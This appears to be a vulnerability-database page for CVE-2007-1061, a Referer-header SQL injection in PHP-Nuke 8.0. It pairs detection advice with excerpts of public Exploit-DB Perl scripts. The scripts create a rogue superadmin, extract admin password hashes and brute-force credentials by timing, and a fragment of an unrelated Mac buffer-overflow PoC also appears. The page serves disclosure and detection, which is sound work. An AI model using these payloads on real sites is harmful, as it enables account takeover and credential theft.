CVE-2007-1061
published 2007-02-22CVE-2007-1061: SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier, when the "HTTP Referers" block is enabled, allows remote attackers…
PriorityP353medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
60.77%
99.0th percentile
SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier, when the "HTTP Referers" block is enabled, allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header (HTTP_REFERER variable).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | <= 8.0_final | — |
Detection & IOCsextracted from sources · hover to see the quote
commandhttp://www.krasza.int.pl');INSERT INTO `nuke_authors` VALUES ('krasza', 'God', 'http://www.krasza.int.pl', '[email protected]', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1', '↗
commandhttp://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*↗
commandhttp://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*↗
- →Inspect the HTTP Referer header on all requests to index.php for SQL metacharacters, particularly single quotes followed by SQL keywords such as INSERT, SELECT, or comment sequences (/* or --). ↗
- →Alert on Referer headers containing INSERT INTO `nuke_authors` payloads, which indicate an attempt to create a rogue superadmin account. ↗
- →Alert on Referer headers containing subqueries targeting `nuke_authors` with `radminsuper`=1, indicating credential extraction via the HTTP Referers block display. ↗
- →Blind time-based SQLi variant uses BENCHMARK() in the Referer header; monitor for anomalously slow responses to index.php correlated with Referer values containing BENCHMARK or IF() constructs. ↗
- →The exploit targets the 'HTTP Referers' block feature specifically; disabling this block removes the injection surface entirely. ↗
- ·The SQL injection is only exploitable when the 'HTTP Referers' block is enabled in PHP-Nuke; installations with this block disabled are not affected. ↗
- ·The INSERT-based exploit (EDB-3345) is stated to work on every database except MySQL; the blind time-based exploit (EDB-3344) is MySQL-specific using BENCHMARK(). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
exploitdb·2008-07-11
CVE-2008-2304 Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
---
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. [email protected]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' , "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fn
Exploit-DB
PHP-Nuke 8.0 Final - 'INSERT' SQL Injection
exploitdb·2007-02-20
CVE-2007-1061 PHP-Nuke 8.0 Final - 'INSERT' SQL Injection
PHP-Nuke 8.0 Final - 'INSERT' SQL Injection
---
#!/usr/bin/perl
#0day exploit for PHP-nuke new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
$referer="http://www.krasza.int.pl');INSERT INTO `nuke_authors` VALUES ('krasza', 'God', 'http://www.krasza.int.pl', 'krasza\@gmail.com', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1', '";
$zadanie->referer($referer);
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]I registered new superadmin\n";
print "[+]You can login at $adres \n";
print "[+]Login:krasza\n";
print "[+]Password:krasza\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version for every
Exploit-DB
PHP-Nuke 8.0 Final - HTTP Referers SQL Injection
exploitdb·2007-02-20
CVE-2007-1061 PHP-Nuke 8.0 Final - HTTP Referers SQL Injection
PHP-Nuke 8.0 Final - HTTP Referers SQL Injection
---
#!/usr/bin/perl
#0day exploit for PHP-nuke new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer);
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer);
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nu
Exploit-DB
PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)
exploitdb·2007-02-20
CVE-2007-1061 PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)
PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)
---
#!/usr/bin/perl
#0day exploit for PHP-nuke = 4.0.24, using 'brute force'
#Coded by:Maciej `krasza` Kukla[[email protected]]
#Screenshot:
#0day exploit for PHP-nuke new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user,$hash,$referer,$czy_dziala,$znak);
banner();
$czas_nor=polacz("http://www.krasza.int.pl");
print "[+]Time normal query: $czas_nor seconds\n";
$dlugosc_user=ustal_dlugosc("aid",8);
print "[+]Length user's record: $dlugosc_user\n";
print "[+]Length password's record: 32\n";
print "[+]Login:\n";
$user=brute_force_aid($dlugosc_user);
print "[+]Password:\n";
$hash=brute_force_pass(32);
print "[+]Super admin:\n";
print "$user:$hash\n";
##
sub br
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052570.htmlhttp://osvdb.org/33316http://secunia.com/advisories/24224http://www.securityfocus.com/archive/1/461148/100/0/threadedhttp://www.securityfocus.com/bid/22638http://www.vupen.com/english/advisories/2007/0673https://exchange.xforce.ibmcloud.com/vulnerabilities/32607https://www.exploit-db.com/exploits/3346http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052570.htmlhttp://osvdb.org/33316http://secunia.com/advisories/24224http://www.securityfocus.com/archive/1/461148/100/0/threadedhttp://www.securityfocus.com/bid/22638http://www.vupen.com/english/advisories/2007/0673https://exchange.xforce.ibmcloud.com/vulnerabilities/32607https://www.exploit-db.com/exploits/3346
2007-02-22
Published